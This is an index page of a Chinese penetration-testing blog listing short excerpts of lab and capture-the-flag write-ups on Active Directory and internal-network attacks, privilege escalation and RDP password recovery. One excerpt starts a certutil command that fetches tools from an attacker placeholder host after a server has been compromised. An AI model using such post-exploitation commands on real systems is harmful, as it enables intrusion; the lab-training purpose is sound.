banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
HomeArchives图文

内网渗透

cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

春秋云镜仿真靶场-Exchange记录

Exchange 是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 Flag,分布于不同的靶机。
春秋云镜
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

game of active directory(GOAD) part 2 查找用户

GOAD第二部分的内容主要包括查找用户名及爆破些密码。
靶场
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

春秋云镜仿真靶场-ThermalPower记录

该场景模拟仿真了电力生产企业的部分业务场景。“火创能源” 公司在未充分重视网络安全的威胁的情况下,将敏感区域的服务错误地配置在公网上,使得外部的 APT 组织可以轻松地访问这些服务,最终导致控制电力分配、生产流程和其他关键设备的服务遭受攻击,并部署了勒索病毒。 玩家的任务是分析 APT 组织的渗透行为,按照关卡列表恢复其攻击路径,并对勒索病毒加密的文件进行解密。
靶场
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

后渗透之文件传输及下载

拿到了服务器之后,就需要上传工具,或者从服务器下载文件,针对不同的场景(网络环境)可能需要用到不同的文件下载工具,平常打靶场也能用得到,这里就简单记录下。 windows Copy certutil -urlcache -split -f "http://<LHOST…
工具
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

春秋云镜靶场--Certify记录

Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
渗透测试
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

ATT&CK红队评估实战靶场-1

靶场来自:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 简单的一个靶场,本来用作学生的考核的,但是没用到,横向的域渗透也只是用了 cobalt strike 上的 psexec 模块,主要的内容是熟悉一些渗透的流程。 靶场有…
靶场
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

game of active directory(GOAD)域环境搭建

Game Of Active directory的第二个版本,项目地址:https://github.com/Orange-Cyberdefense/GOAD 域靶场环境通过 vagrang 安装 5 个 windows 实例(三个 DC,两个普通域内主机),拓朴图如下: 官…
渗透测试
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

lpeworkshop提权实验 - windows

实验环境项目地址: https://github.com/sagishahar-zz/lpeworkshop windows 实验的前提,需要先自己准备一个 Windows 7 (SP1) x64 Build 7601 的英文操作系统,原作者所有的实验都基于此操作系统。 1…
内网渗透
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover
cover

内网渗透基础

内网 内网指的是内部局域网,常说的 LAN(local area network)。常见家庭 wifi 网络和小型的企业网络,通常内部计算机直接访问路由器设备,路由器设备接入移动电信的光纤实现上网。 内部局域网可以通过交换机 / 防火墙组成多个网络(局域…
渗透测试
cover
cover
cover
cover

内网渗透之获取windows远程桌面(RDP)连接记录密码

利用条件:就是mstsc连接的时候,管理员勾选了自动保存密码连接的选项。
内网渗透
Ownership of this blog data is guaranteed by blockchain and smart contracts to the creator alone.